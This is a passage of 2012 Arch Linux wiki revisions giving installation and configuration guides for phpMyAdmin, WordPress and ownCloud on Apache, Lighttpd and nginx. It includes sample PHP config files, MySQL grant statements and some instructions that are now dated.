$cfg['TextareaAutoSelect'] = false;<br />
$cfg['CharEditing'] = 'input';<br />
$cfg['CharTextareaCols'] = 40;<br />
$cfg['CharTextareaRows'] = 2;<br />
$cfg['CtrlArrowsMoving'] = true;<br />
$cfg['DefaultPropDisplay'] = 'horizontal';<br />
$cfg['InsertRows'] = 2;<br />
$cfg['EditInWindow'] = true;<br />
$cfg['QueryWindowHeight'] = 310;<br />
$cfg['QueryWindowWidth'] = 550;<br />
$cfg['QueryWindowDefTab'] = 'sql';<br />
$cfg['ForceSSL'] = false;<br />
$cfg['ShowPhpInfo'] = false;<br />
$cfg['ShowChgPassword'] = false;<br />
$cfg['AllowArbitraryServer'] = false;<br />
$cfg['LoginCookieRecall'] = 'something';<br />
$cfg['LoginCookieValidity'] = 1800;<br />
?><br />
}}</div>Wakehttps://wiki.archlinux.org/index.php?title=PhpMyAdmin&diff=234184PhpMyAdmin2012-11-07T03:18:05Z<p>Wake: /* Check php module configuration */ Configuring apache, not php. Rm duplicate config info (difficult to maintain docs).</p>
<hr />
<div>[[Category:Web Server]]<br />
{{lowercase title}}<br />
[[cs:PhpMyAdmin]]<br />
[[es:PhpMyAdmin]]<br />
[[fr:phpmyadmin]]<br />
[[ru:PhpMyAdmin]]<br />
[[tr:PhpMyAdmin]]<br />
[[zh-CN:PhpMyAdmin]]<br />
==Pre-Installation==<br />
See [[LAMP]] for a guide to setting up Apache, MySQL, and PHP.<br />
<br />
==Installation==<br />
To install [http://www.phpmyadmin.net/ phpMyAdmin], install the ''phpmyadmin'' and ''php-mcrypt'' packages with<br />
{{bc|<br />
pacman -S phpmyadmin php-mcrypt<br />
}}<br />
<br />
== Configuration ==<br />
Ensure you do not have an older copy of phpMyAdmin.<br />
{{bc|<br />
rm -r /srv/http/phpMyAdmin<br />
}}<br />
<br />
Copy the example configuration file to your httpd configuration directory.<br />
{{bc|<br />
cp /etc/webapps/phpmyadmin/apache.example.conf /etc/httpd/conf/extra/httpd-phpmyadmin.conf<br />
}}<br />
<br />
Add the following lines to {{ic|/etc/httpd/conf/httpd.conf}}:<br />
{{bc|<br />
# phpMyAdmin configuration<br />
Include conf/extra/httpd-phpmyadmin.conf<br />
}}<br />
<br />
You can type this into the terminal to produce the same effect:<br />
{{bc|<br />
echo -e "\nInclude conf/extra/httpd-phpmyadmin.conf" >> /etc/httpd/conf/httpd.conf<br />
}}<br />
<br />
=== Enable php handling in Apache ===<br />
<br />
Add the following lines to {{ic|/etc/httpd/conf/httpd.conf}}:<br />
{{bc|<br />
# Use for PHP 5.x:<br />
LoadModule php5_module modules/libphp5.so<br />
AddHandler php5-script php<br />
}}<br />
<br />
Add index.php after "DirectoryIndex index.html"<br />
{{bc|<br />
# DirectoryIndex: sets the file that Apache will serve if a directory<br />
# is requested.<br />
#<br />
<IfModule dir_module><br />
DirectoryIndex index.html index.php<br />
</IfModule><br />
}}<br />
<br />
=== Adjust access rights ===<br />
<br />
In {{ic|/etc/webapps/phpmyadmin/.htaccess}}, comment out ''deny from all''. The line should look like this:<br />
#deny from all<br />
<br />
Alternatively, you can restrict access to localhost and your local network only. Replace ''192.168.1.0/24'' with your network's IP block.<br />
deny from all<br />
allow from localhost<br />
allow from 192.168.1.0/24<br />
<br />
The lines above are not enough if you use ipv6 in {{ic|/etc/hosts}}. If so, add one more line to {{ic|/etc/webapps/phpmyadmin/.htaccess}}:<br />
allow from ::1<br />
<br />
Otherwise you'll get an error similar to "Error 403 - Access forbidden!" when you attempt to access your phpMyAdmin installation.<br />
<br />
=== Review apache phpmyadmin configuration ===<br />
<br />
Your {{ic|/etc/httpd/conf/extra/httpd-phpmyadmin.conf}} should have the following information:<br />
{{bc|<br />
Alias /phpmyadmin "/usr/share/webapps/phpMyAdmin"<br />
<Directory "/usr/share/webapps/phpMyAdmin"><br />
AllowOverride All<br />
Options FollowSymlinks<br />
Order allow,deny<br />
Allow from all<br />
php_admin_value open_basedir "/srv/:/tmp/:/usr/share/webapps/:/etc/webapps:/usr/share/pear/"<br />
</Directory><br />
}}<br />
<br />
You need the mcrypt (if you want phpmyadmin internal authentication) and mysql modules, so uncomment the following in {{ic|/etc/php/php.ini}}:<br />
extension=mcrypt.so<br />
extension=mysql.so<br />
extension=mysqli.so (optional)<br />
<br />
and {{ic|rc.d restart httpd}}.<br />
<br />
=== Add blowfish_secret passphrase ===<br />
If you see the following error message at the bottom of the page when you first log in to /phpmyadmin (using a previously setup MySQL username and password) :<br />
<br />
ERROR: The configuration file now needs a secret passphrase (blowfish_secret)<br />
<br />
You need to add a blowfish password to the phpMyAdmin's config file. Edit {{ic|/etc/webapps/phpmyadmin/config.inc.php}} and insert a random blowfish "password" in the line <br />
<br />
$cfg['blowfish_secret'] = ''; /* YOU MUST FILL IN THIS FOR COOKIE AUTH! */<br />
<br />
Go [http://www.question-defense.com/tools/phpmyadmin-blowfish-secret-generator here] to get a nicely generated blowfish_secret and paste it between the '' marks. It should now look something like this:<br />
<br />
$cfg['blowfish_secret'] = 'qtdRoGmbc9{8IZr323xYcSN]0s)r$9b_JUnb{~Xz'; /* YOU MUST FILL IN THIS FOR COOKIE AUTH! */<br />
<br />
The error should go away if you refresh the phpmyadmin page.<br />
<br />
=== Enabling Configuration Storage (optional) ===<br />
Now that the basic database server has been setup, it ''is'' functional, however by default, extra options such as table linking, change tracking, PDF creation, and bookmarking queries are disabled. You will see a message at the bottom of the main phpMyAdmin page, "The phpMyAdmin configuration storage is not completely configured, some extended features have been deactivated. To find out why...", This section addresses how to to enable these extra features.<br />
<br />
{{note|This example assumes you want to use the username '''pma''' as the controluser, and '''pmapass''' as the controlpass. These should be changed (the ''very'' least, you should change the password!) to something more secure.}}<br />
<br />
In {{ic|/etc/webapps/phpmyadmin/config.inc.php}}, uncomment (remove the leading "//"s on) these two lines, and change them to your desired credentials:<br />
{{bc|1=<br />
// $cfg['Servers'][$i]['controluser'] = 'pma';<br />
// $cfg['Servers'][$i]['controlpass'] = 'pmapass';<br />
}}<br />
You will need this information later, so keep it in mind.<br />
<br />
Beneath the controluser setup section, uncomment these lines:<br />
{{bc|1=<br />
/* Storage database and tables */<br />
// $cfg['Servers'][$i]['pmadb'] = 'phpmyadmin';<br />
// $cfg['Servers'][$i]['bookmarktable'] = 'pma_bookmark';<br />
// $cfg['Servers'][$i]['relation'] = 'pma_relation';<br />
// $cfg['Servers'][$i]['table_info'] = 'pma_table_info';<br />
// $cfg['Servers'][$i]['table_coords'] = 'pma_table_coords';<br />
// $cfg['Servers'][$i]['pdf_pages'] = 'pma_pdf_pages';<br />
// $cfg['Servers'][$i]['column_info'] = 'pma_column_info';<br />
// $cfg['Servers'][$i]['history'] = 'pma_history';<br />
// $cfg['Servers'][$i]['tracking'] = 'pma_tracking';<br />
// $cfg['Servers'][$i]['designer_coords'] = 'pma_designer_coords';<br />
// $cfg['Servers'][$i]['userconfig'] = 'pma_userconfig';<br />
// $cfg['Servers'][$i]['recent'] = 'pma_recent';<br />
}}<br />
<br />
Next, create the user with the above details. Don't set any permissions for it just yet.<br />
{{note|If you can't login to phpmyadmin, make sure that your mysql server is started.}}<br />
<br />
<br />
===== creating phpMyAdmin database =====<br />
Using the phpMyAdmin web interface:<br />
Import {{ic|/usr/share/webapps/phpMyAdmin/examples/create_tables.sql}} from phpMyAdmin -> Import.<br />
'''or'''<br />
Using command line:<br />
{{ic|mysql -uroot -p < /usr/share/webapps/phpMyAdmin/examples/create_tables.sql }}<br />
<br />
===== creating phpMyAdmin database user =====<br />
Now to apply the permissions to your controluser, in the SQL tab, make sure to replace all instances of 'pma' and 'pmapass' to the values set in config.inc.php. If you are setting this up for a remote database, then you must also change 'localhost' to the proper host:<br />
{{bc|<br />
GRANT USAGE ON mysql.* TO 'pma'@'localhost' IDENTIFIED BY 'pmapass';<br />
GRANT SELECT (<br />
Host, User, Select_priv, Insert_priv, Update_priv, Delete_priv,<br />
Create_priv, Drop_priv, Reload_priv, Shutdown_priv, Process_priv,<br />
File_priv, Grant_priv, References_priv, Index_priv, Alter_priv,<br />
Show_db_priv, Super_priv, Create_tmp_table_priv, Lock_tables_priv,<br />
Execute_priv, Repl_slave_priv, Repl_client_priv<br />
) ON mysql.user TO 'pma'@'localhost';<br />
GRANT SELECT ON mysql.db TO 'pma'@'localhost';<br />
GRANT SELECT ON mysql.host TO 'pma'@'localhost';<br />
GRANT SELECT (Host, Db, User, Table_name, Table_priv, Column_priv)<br />
ON mysql.tables_priv TO 'pma'@'localhost';<br />
}}<br />
<br />
In order to take advantage of the bookmark and relation features, you will also need to give '''pma''' some additional permissions:<br />
{{Note|as long as you did not change the value of '''$cfg['Servers'][$i]['pmadb']''' in {{ic|/etc/webapps/phpmyadmin/config.inc.php}}, then '''<pma_db>''' should be '''phpmyadmin'''}}<br />
{{bc|GRANT SELECT, INSERT, UPDATE, DELETE ON <pma_db>.* TO 'pma'@'localhost';}}<br />
<br />
Log out, and back in to ensure the new features are activated. The message at the bottom of the main screen should now be gone.<br />
<br />
==Accessing your phpMyAdmin installation==<br />
Finally your phpmyadmin installation is complete. Before you start using it you need to restart your apache server by following command:<br />
<br />
{{bc|<br />
# rc.d restart httpd<br />
}}<br />
<br />
You can access your phpmyadmin installation using the following url:<br />
<br />
{{bc|<br />
http://localhost/phpmyadmin/<br />
or<br />
http://localhost/phpmyadmin/index.php<br />
}}<br />
<br />
Note: 'localhost' is the hostname in your /etc/rc.conf file.<br />
<br />
If you want to access it using:<br />
<br />
{{bc|<br />
http://localhost/phpmyadmin<br />
}}<br />
<br />
in '/etc/httpd/conf/extra/httpd-phpmyadmin.conf' change:<br />
<br />
{{bc|<br />
Alias /phpmyadmin/ "/usr/share/webapps/phpMyAdmin/"<br />
}}<br />
<br />
to<br />
<br />
{{bc|<br />
Alias /phpmyadmin "/usr/share/webapps/phpMyAdmin"<br />
}}<br />
<br />
You should also read [http://bbs.archlinux.org/viewtopic.php?pid=632500 this thread].<br />
<br />
If you get the error "#2002 - The server is not responding (or the local MySQL server's socket is not correctly configured)" then you might want to change "localhost" in /etc/webapps/phpmyadmin/config.inc.php on this line:<br />
<br />
{{bc|1=<br />
$cfg['Servers'][$i]['host'] = 'localhost';<br />
}}<br />
<br />
to your hostname specified in /etc/hosts and /etc/rc.conf under HOSTNAME.<br />
<br />
If you would like to use phpmyadmin setup script by calling http://localhost/phpmyadmin/setup you will need to create a config directory that's writeable by the httpd in the /usr/share/webapps/phpmyadmin as follows:<br />
<br />
{{bc|<br />
cd /usr/share/webapps/phpMyAdmin<br />
sudo mkdir config<br />
sudo chgrp http config<br />
sudo chmod g+w config<br />
}}<br />
<br />
==Lighttpd Configuration==<br />
The php setup for lighttpd is exactly the same as for apache.<br />
Make an alias for phpmyadmin in your lighttpd config.<br />
alias.url = ( "/phpmyadmin" => "/usr/share/webapps/phpMyAdmin/")<br />
Then enable mod_alias, mod_fastcgi and mod_cgi in your config ( server.modules section )<br />
<br />
Update open_basedir in /etc/php/php.ini and add "/usr/share/webapps/".<br />
open_basedir = /srv/http/:/home/:/tmp/:/usr/share/pear/:/usr/share/webapps/:/etc/webapps/<br />
<br />
Make sure lighttpd is setup to serve php files, [[Lighttpd]]<br />
<br />
Restart lighttpd and browse to http://localhost/phpmyadmin/index.php<br />
<br />
==NGINX Configuration==<br />
Also similar to apache configuration (and Lighttpd, for that matter).<br />
<br />
Create a symbolic link to the /usr/share/webapps/phpmyadmin directory from whichever directory your vhost is serving files from, e.g. /srv/http/<domain>/public_html/<br />
<br />
sudo ln -s /usr/share/webapps/phpMyAdmin /srv/http/<domain>/public_html/phpmyadmin<br />
<br />
You can also setup a sub domain with a server block like so (if using php-fpm):<br />
<br />
server {<br />
server_name phpmyadmin.<domain.tld>;<br />
access_log /srv/http/<domain>/logs/phpmyadmin.access.log;<br />
error_log /srv/http/<domain.tld>/logs/phpmyadmin.error.log;<br />
<br />
location / {<br />
root /srv/http/<domain.tld>/public_html/phpmyadmin;<br />
index index.html index.htm index.php;<br />
}<br />
<br />
location ~ \.php$ {<br />
root /srv/http/<domain.tld>/public_html/phpmyadmin;<br />
fastcgi_pass unix:/var/run/php-fpm/php-fpm.sock;<br />
fastcgi_index index.php;<br />
fastcgi_param SCRIPT_FILENAME /srv/http/<domain.tld>/public_html/phpmyadmin/$fastcgi_script_name;<br />
include fastcgi_params;<br />
}<br />
}<br />
<br />
Update open_basedir in /etc/php/php.ini and add "/usr/share/webapps/".<br />
open_basedir = /srv/http/:/home/:/tmp/:/usr/share/pear/:/usr/share/webapps/:/etc/webapps/<br />
<br />
You may run into some issues with phpmyadmin telling you "The Configuration File Now Needs A Secret Passphrase" and no matter what you enter, the error is still displayed. Try changing the ownership of the files to the NGINX specified user/group, e.g. nginx...<br />
<br />
sudo chown -R http:http /usr/share/webapps/phpMyAdmin<br />
<br />
If the above doesn't fix it try adding the following to your NGINX Configuration below the other fastcgi_param (I think its something to do with the Suhosin-Patch)<br />
<br />
fastcgi_param PHP_ADMIN_VALUE open_basedir="/srv/:/tmp/:/usr/share/webapps/:/etc/webapps:/usr/share/pear/";<br />
<br />
While you can enter anything for the blowfish password, you may want to choose a randomly generated string of characters (most likely for security reasons). Here's a handy tool that will do that for you on the web[http://www.question-defense.com/tools/phpmyadmin-blowfish-secret-generator].<br />
<br />
When using SSL, you might run into the problem that the links on the pages generated by phpMyAdmin incorrectly start with "http" instead of "https" which may cause errors. To fix this, you can add the following fcgi_param to your SSL-enabled server section (in addition to your usual fastcgi params):<br />
<br />
fastcgi_param HTTPS on;<br />
<br />
==Other (Older) information==<br />
<br />
This page holds a sample 'config.inc.php' file that you can place in the main phpMyAdmin directory so that it immediately starts working<br />
<br />
'''Things you should do first'''<br />
<br />
Create a 'controluser', so that phpmyadmin can read from the main mysql database.<br />
<br />
{{bc|mysql -u root -pYOURROOTPASSWORD<br />
mysql> grant usage on mysql.* to controluser@localhost identified by 'CONTROLPASS';<br />
}}<br />
<br />
'''Where is phpmyadmin'''<br />
<br />
in phpmyadmin 3.2.2-3 the file is missing /srv/http/ create this symlik<br />
<br />
{{bc|ln -s /usr/share/webapps/phpMyAdmin/ /srv/http/phpmyadmin<br />
}}<br />
<br />
'''Things you should change'''<br />
<br />
controluser is set to controluser <br><br />
controlpass is set to password <br><br />
verbose is set to name_of_server<br />
<br />
'''Sample 'config.inc.php' file'''<br />
{{bc|1=<br />
<?php<br />
/*<br />
* Generated configuration file<br />
* Generated by: phpMyAdmin 2.11.8.1 setup script by Michal Čihař <michal@cihar.com><br />
* Version: $Id: setup.php 11423 2008-07-24 17:26:05Z lem9 $<br />
* Date: Mon, 01 Sep 2008 20:34:02 GMT<br />
*/<br />
<br />
/* Servers configuration */<br />
$i = 0;<br />
<br />
/* Server ravi-test-mysql (http) [1] */<br />
$i++;<br />
$cfg['Servers'][$i]['host'] = 'localhost';<br />
$cfg['Servers'][$i]['extension'] = 'mysql';<br />
$cfg['Servers'][$i]['port'] = '3306';<br />
$cfg['Servers'][$i]['connect_type'] = 'tcp';<br />
$cfg['Servers'][$i]['compress'] = false;<br />
$cfg['Servers'][$i]['controluser'] = 'controluser';<br />
$cfg['Servers'][$i]['controlpass'] = 'password';<br />
$cfg['Servers'][$i]['auth_type'] = 'http';<br />
$cfg['Servers'][$i]['verbose'] = 'name_of_server';<br />
<br />
/* End of servers configuration */<br />
<br />
$cfg['LeftFrameLight'] = true;<br />
$cfg['LeftFrameDBTree'] = true;<br />
$cfg['LeftFrameDBSeparator'] = '_';<br />
$cfg['LeftFrameTableSeparator'] = '__';<br />
$cfg['LeftFrameTableLevel'] = 1;<br />
$cfg['LeftDisplayLogo'] = true;<br />
$cfg['LeftDisplayServers'] = false;<br />
$cfg['DisplayServersList'] = false;<br />
$cfg['DisplayDatabasesList'] = 'auto';<br />
$cfg['LeftPointerEnable'] = true;<br />
$cfg['DefaultTabServer'] = 'main.php';<br />
$cfg['DefaultTabDatabase'] = 'db_structure.php';<br />
$cfg['DefaultTabTable'] = 'tbl_structure.php';<br />
$cfg['LightTabs'] = false;<br />
$cfg['ErrorIconic'] = true;<br />
$cfg['MainPageIconic'] = true;<br />
$cfg['ReplaceHelpImg'] = true;<br />
$cfg['NavigationBarIconic'] = 'both';<br />
$cfg['PropertiesIconic'] = 'both';<br />
$cfg['BrowsePointerEnable'] = true;<br />
$cfg['BrowseMarkerEnable'] = true;<br />
$cfg['ModifyDeleteAtRight'] = false;<br />
$cfg['ModifyDeleteAtLeft'] = true;<br />
$cfg['RepeatCells'] = 100;<br />
$cfg['DefaultDisplay'] = 'horizontal';<br />
$cfg['TextareaCols'] = 40;<br />
$cfg['TextareaRows'] = 7;<br />
$cfg['LongtextDoubleTextarea'] = true;<br />
$cfg['TextareaAutoSelect'] = false;<br />
$cfg['CharEditing'] = 'input';<br />
$cfg['CharTextareaCols'] = 40;<br />
$cfg['CharTextareaRows'] = 2;<br />
$cfg['CtrlArrowsMoving'] = true;<br />
$cfg['DefaultPropDisplay'] = 'horizontal';<br />
$cfg['InsertRows'] = 2;<br />
$cfg['EditInWindow'] = true;<br />
$cfg['QueryWindowHeight'] = 310;<br />
$cfg['QueryWindowWidth'] = 550;<br />
$cfg['QueryWindowDefTab'] = 'sql';<br />
$cfg['ForceSSL'] = false;<br />
$cfg['ShowPhpInfo'] = false;<br />
$cfg['ShowChgPassword'] = false;<br />
$cfg['AllowArbitraryServer'] = false;<br />
$cfg['LoginCookieRecall'] = 'something';<br />
$cfg['LoginCookieValidity'] = 1800;<br />
?><br />
}}</div>Wakehttps://wiki.archlinux.org/index.php?title=Wordpress&diff=234183Wordpress2012-11-07T02:49:37Z<p>Wake: /* Configure apache */ rc.d deprecated</p>
<hr />
<div>[[Category:Web Server]]<br />
{{Article summary start}}<br />
{{Article summary text|Wordpress is an easy to setup and administer FLOSS content management system featuring a strong and vibrant community with thousands of plugins and themes.}}<br />
{{Article summary heading|Related}}<br />
{{Article summary wiki|LAMP}}<br />
{{Article summary wiki|PHP}}<br />
{{Article summary wiki|MySQL}}<br />
{{Article summary wiki|phpMyAdmin}}<br />
{{Article summary end}}<br />
<br />
[http://wordpress.org Wordpress] is the goto Free Libre Open Source Software ([[Wikipedia:Free and open-source software|FLOSS]]) content management system ([[Wikipedia:Content management system|CMS]]) created by [[Wikipedia:Matt Mullenweg|Matt Mullenweg]] and first released in 2003. Wordpress has a vast and vibrant community that provides tens of thousands of free plugins and themes to allow the user to easily customize the appearance and function of their Wordpress CMS. Wordpress is licensed under the GPLv2.<br />
<br />
The biggest feature of Wordpress is its ease in configuration and administration. [http://codex.wordpress.org/Installing_WordPress Setting up a Wordpress site takes five minutes]. The Wordpress administration panel allows users to easily configure almost every aspect of their website including fetching and installing plugins and themes. Wordpress provides effortless automatic updates.<br />
<br />
== Installation ==<br />
<br />
Wordpress also requires [[PHP]] and [[MySQL]] to be installed and configured. See the [[LAMP]] wiki article for more information.<br />
<br />
{{note|As of August 2012, this article does not support using Wordpress with PostrgreSQL. Wordpress was designed to be used with mysql only. It is possible to use Wordpress with other databases such as PostgreSQL, through the use of a [http://wordpress.org/extend/plugins/postgresql-for-wordpress/ plugin] and a bit of work.}}<br />
<br />
=== Installation using pacman ===<br />
<br />
[[pacman|Install]] {{pkg|wordpress}} from the [[official repositories]].<br />
<br />
{{warning|While it is easier to let pacman manage updating your Wordpress install, this is not necessary. Wordpress has functinality built-in for managing updates, themes, and plugins. If you decide to install the official community package, you will not be able to install plugins and themes using the Wordpress admin panel without a needlessly complex permissions setup, or logging into FTP as root. pacman does not delete the Wordpress install directory when uninstalling it from your system regardless of whether or not you have added data to the directory manually or otherwise.}}<br />
<br />
=== Manual install ===<br />
<br />
Go to [http://wordpress.org/download/ wordpress.org] and download the latest version of Wordpress and extract it to your webserver directory. Give the directory enough permissions to allow your FTP user to write to the directory (used by Wordpress).<br />
<br />
cd /srv/http/whatever<br />
wget https://wordpress.org/latest.tar.gz<br />
tar xvvf latest.tar.gz<br />
<br />
== Configuration ==<br />
<br />
The configuration method used here assumes you are using Wordpress on a local network.<br />
<br />
=== Host config ===<br />
<br />
Make sure your {{ic|/etc/hosts}} file is setup correctly. This will be important when accessing your Wordpress CMS from a local network. Your {{ic|/etc/hosts}} file should look something like the following,<br />
<br />
{{bc|#<ip-address> <hostname.domain.org> <hostname><br />
127.0.0.1 lithium.kaboodle.net localhost lithium<br />
::1 lithium.kaboodle.net localhost lithium}}<br />
<br />
{{note|You will need to use a proxy server to access your Wordpress installation from mobile devices if you plan on using hostnames to install Wordpress, otherwise your website will appear broken [[#Appearance is broken (no styling)]].}}<br />
<br />
=== Configure apache ===<br />
<br />
You will need to create a config file for apache to find your Wordpress install. Create the following file and edit it your favorite text editor:<br />
<br />
{{hc|# /etc/httpd/conf/extra/httpd-wordpress.conf|<br />
Alias /wordpress "/usr/share/webapps/wordpress"<br />
<Directory "/usr/share/webapps/wordpress"><br />
AllowOverride All<br />
Options FollowSymlinks<br />
Order allow,deny<br />
Allow from all<br />
php_admin_value open_basedir "/srv/:/tmp/:/usr/share/webapps/:/etc/webapps:$"<br />
</Directory>}}<br />
<br />
Change {{ic|/wordpress}} in the first line to whatever you want. For example, {{ic|/myblog}} would require that you navigate to {{ic|http://hostname/myblog}} to see your Wordpress website.<br />
<br />
Also change the paths to your Wordpress install folder in case you did a manual install. Don't forget to append the parent directory to the {{ic|php_admin_value}} variable as well as shown below.<br />
<br />
{{hc|# /etc/httpd/conf/extra/httpd-wordpress.conf|<br />
Alias /myblog "/mnt/data/srv/wordpress"<br />
<Directory "/mnt/data/srv/wordpress"><br />
AllowOverride All<br />
Options FollowSymlinks<br />
Order allow,deny<br />
Allow from all<br />
php_admin_value open_basedir "/srv/:/tmp/:/usr/share/webapps/:/etc/webapps:/mnt/data/srv:$"<br />
</Directory>}}<br />
<br />
Next edit the apache config file and add the following:<br />
<br />
{{hc|# /etc/httpd/conf/httpd.conf|<br />
...<br />
Include conf/extra/httpd-wordpress.conf<br />
...<br />
}}<br />
<br />
Now restart apache<br />
{{bc|# systemctl restart httpd (''deprecated'': {{ic|# rc.d restart httpd}})}}<br />
<br />
=== Configure MySQL ===<br />
<br />
MySQL can be configured using a plethora of tools, but the most common are the command line or [http://www.phpmyadmin.net/home_page/index.php phpMyAdmin].<br />
<br />
==== Using phpMyAdmin ====<br />
<br />
See [[phpMyAdmin]] to install and configure phpMyAdmin.<br />
<br />
In your web browser, navigate to your phpMyAdmin host and perform the following<br />
steps:<br />
<br />
# Login to phpMyAdmin.<br />
# Click "user" and then click "Add user".<br />
# Give the pop up window a name and a password.<br />
# Select "Create database with same name and grant all privileges".<br />
# Click the "Add user" button to create the user.<br />
<br />
== Wordpress Installation ==<br />
<br />
Once you have spent a couple of hours setting up your http server, php, and mysql, it is finally time to let Wordpress have its five minutes and install itself. So let us begin.<br />
<br />
The Wordpress installation procedure will use the URL in the address field of your web browser as the default website URL. If you have navigated to http://localhost/wordpress, your website will be accessible from your local network, but it will be broken in appearance and function.<br />
<br />
# Navigate to {{ic|http://hostname/wordpress}}.<br />
# Click the "Create a Configuration File" button.<br />
# Click the "Let's go!" button.<br />
# Fill in you database information created in the previous section<br />
# Click "Submit".<br />
<br />
If you installed Wordpress from the Official repository, then this setup procedure will not have the correct permissions to create the wp-config.php file used by Wordpress. You will have to do this step yourself as root using information Wordpress will provide.<br />
<br />
A page will appear saying Wordpress can not write the wp-config.php file. Copy the text in the edit box and open {{ic|/usr/share/webapps/wordpress/wp-config.php}} as root in your text editor. Paste the copied text into the editor and save the file.<br />
<br />
Finally, Click "Run the install" and Wordpress will populate the database with your information. Once complete, you will be shown "Success!" page. Click the login button to finish your installation.<br />
<br />
Now would be a good time to access your website from all your devices to be sure your Wordpress installation is setup correctly.<br />
<br />
== Usage ==<br />
<br />
=== Installing a theme ===<br />
<br />
There are tens of thousands of themes available for Wordpress. Searching on google for a good theme can be like wading through a river filled with trash. Good places for looking for themes include [http://www.smashingmagazine.com/ Smashing Magazine] and the [http://wordpress.org/extend/themes/ official Wordpress theme website]. There is also pay for theme sites like [http://www.woothemes.com/ Woo Themes] and [http://thethemefoundry.com/ The Theme Factory].<br />
<br />
==== Using the admin panel ====<br />
<br />
Before installing a theme using the admin panel, you will need to setup an [https://wiki.archlinux.org/index.php/Very_Secure_FTP_Daemon FTP] server on your Wordpress host.<br />
<br />
Once the FTP server is setup, login to your Wordpress installation and click <nowiki>"Appearance->Install Themes->Upload"</nowiki>. From there select your zip file that contains your theme and click "Install Now". You will be presented with a box asking for FTP information, enter it and click "Proceed". If you have been following along closely, you should now have an installed theme. Activate it if you wish.<br />
<br />
=== Installing a plugin ===<br />
<br />
The steps for installing a plugin are the same as they are for installing a theme. Just click the "Plugins" link in the left navigation bar and follow the steps. Wordpress is very easy to use.<br />
<br />
=== Updating ===<br />
<br />
Every now and then when you log into wordpress there will be a notification informing you of updates. If you have correctly installed and configured an FTP client, and have the correct filesystem permissions to write in the Wordpress install path then you should be able to perform updates at the click of a button. Just follow the steps.<br />
<br />
== Troubleshooting ==<br />
<br />
=== Appearance is broken (no styling) ===<br />
<br />
Your Wordpress website will appear to have no styling to it when viewing it in a web browser (desktop or mobile) that does not have its hostnames mapped to ip addresses correctly.<br />
<br />
This occurs because you used a url with the hostname of your server, instead of an ip address, when doing the initial setup and Wordpress has used this as the default website URL.<br />
<br />
To fix this, you will either need to edit your /etc/hosts file or setup a proxy server. For an easy to setup proxy server, see [[Polipo]], or if you want something with a little more configuration, see [[Squid]].<br />
<br />
== Tips and tricks ==<br />
<br />
== See also ==<br />
* [[Wikipedia:WordPress|Wordpress]]<br />
* [[Wikipedia:Content management system|Content management system]]</div>Wakehttps://wiki.archlinux.org/index.php?title=Nextcloud&diff=233313Nextcloud2012-11-03T02:50:56Z<p>Wake: /* Installation */ systemd</p>
<hr />
<div>[[Category:Web Server]]<br />
[[fr:Owncloud]]<br />
[http://en.wikipedia.org/wiki/OwnCloud ownCloud] is a software suite that provides a location-independent storage area for data (cloud storage).<br />
<br />
== Installation ==<br />
{{AUR|owncloud}} is available in the [[AUR]]. <br />
#First of all set up the [[LAMP]] stack as described in the corresponding Wiki article. <br />
#Install the {{AUR|owncloud}} package as described in [[AUR#Installing_packages]].<br />
#Add the following lines into '''/etc/httpd/conf/httpd.conf''' (php5 should have been configured during the LAMP stack setup):<br />
Include /etc/httpd/conf/extra/owncloud.conf<br />
LoadModule php5_module modules/libphp5.so<br />
Include conf/extra/php5_module.conf<br />
Uncomment extensions in '''/etc/php/php.ini'''<br />
gd.so<br />
xmlrpc.so<br />
zip.so<br />
iconv.so<br />
Depending on which database backend you are going to use uncomment either one of the following extensions in '''/etc/php/php.ini'''<br />
sqlite.so<br />
sqlite3.so<br />
pdo_sqlite.so<br />
OR<br />
mysql.so<br />
mysqli.so<br />
pdo_mysql.so<br />
now restart the apache server with:<br />
# rc.d restart httpd<br />
or<br />
# systemctl restart httpd<br />
and open [http://localhost http://localhost] in your browser. You should now be able to create a user account and follow the installation wizard.<br />
<br />
== Custom configurations ==<br />
<br />
=== Filesize Limitations ===<br />
With the default configuration ownCloud only allows the upload of filesizes less than 2MB.<br />
This can be changed by changing the following line in '''/etc/php/php.ini''' to your liking.<br />
<br />
'''As of version 4.0 this is no longer necessary! The maximum upload size is now set via the ownCloud gui'''<br />
upload_max_filesize = 2M<br />
<br />
As of version 4.5, upload limits are set in '''/usr/share/webapps/owncloud/.htaccess'''. This won't work if [[LAMP#Using_php5_with_apache2-mpm-worker_and_mod_fcgid|PHP is set up to run as CGI]], so you need to change the limits in '''/etc/php/php.ini'''. You also need to change open_basedir.<br />
upload_max_filesize = 512M<br />
post_max_size = 512M<br />
memory_limit = 512M<br />
open_basedir = /srv/http/:/home/:/tmp/:/usr/share/pear/:/usr/share/webapps/<br />
<br />
=== Running owncloud in a subdirectory ===<br />
<br />
By including the default '''owncloud.conf''' in '''httpd.conf''', owncloud will take control of port 80 and your localhost domain. If you would like to have owncloud run in a subdirectory, then skip the 'Include /etc/httpd/conf/extra/owncloud.conf' line altogether and just use a symbolic link like so: <br />
ln -s /usr/share/webapps/owncloud/ /srv/http/<br />
<br />
== Filling ownCloud with data ==<br />
=== Small Files ===<br />
Always use [[WebDAV]] or the web interface to add new files to your ownCloud. Otherwise they will not show up correctly, as they do not get indexed right.<br />
<br />
Consider installing and enabling php-apc to speed up WebDAV.<br />
<br />
When using [[SABnzbd]], you might want to set<br />
folder_rename 0<br />
in your sabnzbd.ini file, because ownCloud will scan the files as soon as they get uploaded, preventing SABnzbd from removing UNPACKING prefixes etc.<br />
<br />
=== Big Files ===<br />
WebDAV isn't suitable for big files, because it fills up all the RAM and CPU.<br />
<br />
With the current version, it looks like, there is no good way of copying huge amounts of data to your ownCloud.<br />
<br />
<br />
Here's a Workaround:<br />
<br />
copy the files directly to your ownCloud and do a full re-scan of your database (you could use the [http://apps.owncloud.com/content/show.php?content=151948&forumpage=0&PHPSESSID=37b915160effcc0f37cc761ad2ab88be Re-scan filesystem] add-on for example).<br />
<br />
<br />
But beware that this will not work as easily in the future, when end-to-end encryption gets added to ownCloud (this is a planned feature).<br />
<br />
== Important Notes ==<br />
* When using a subdomain (like cloud.example.xxx), make sure it is covered by your certificate. Otherwise, connection via the owncloud client or webdav might fail.<br />
<br />
* If you are planning on using OwnCloud's [http://owncloud.org/sync-clients/ sync-clients], make sure to have [[Network_Time_Protocol_daemon|NTP]] installed and running on your OwnCloud server, otherwise the sync-clients will fail.<br />
<br />
* Add some [[LAMP#SSL|SSL encryption]] to your connection!</div>Wake